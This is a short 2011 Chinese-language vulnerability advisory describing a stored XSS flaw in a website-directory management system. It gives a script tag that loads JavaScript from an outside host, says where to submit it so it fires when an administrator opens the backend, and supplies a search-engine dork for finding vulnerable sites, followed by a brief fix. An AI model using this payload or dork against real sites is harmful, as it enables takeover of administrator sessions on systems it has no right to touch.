第一网站导航网址管理系统 V110105 Xss跨站漏洞
时间:2011-01-06 来源:B0mbErM@n
发布日期:2011-01.06
发布作者:B0mbErM@n
影响版本:第一网站导航网址管理系统 V110105
官方网站:http://www.dywz.com/
漏洞类型:XSS跨站
漏洞描述:第一网站导航网址管理系统 前台提交数据未进行过滤导致XSS跨站代码攻击。
XSS code:
<SCRIPT SRC=http://521.im/XSS/xss.js></SCRIPT>
Exp:
前台page/login/index.asp提交,后台打开时触发js语句,js很强大的..
提交:
触发:
关键字:intext:dywz.com 版权所有
修补方法:page/login/index.asp过滤关键字.
标签分类: 跨站XSS
相关阅读 更多 +
排行榜 更多 +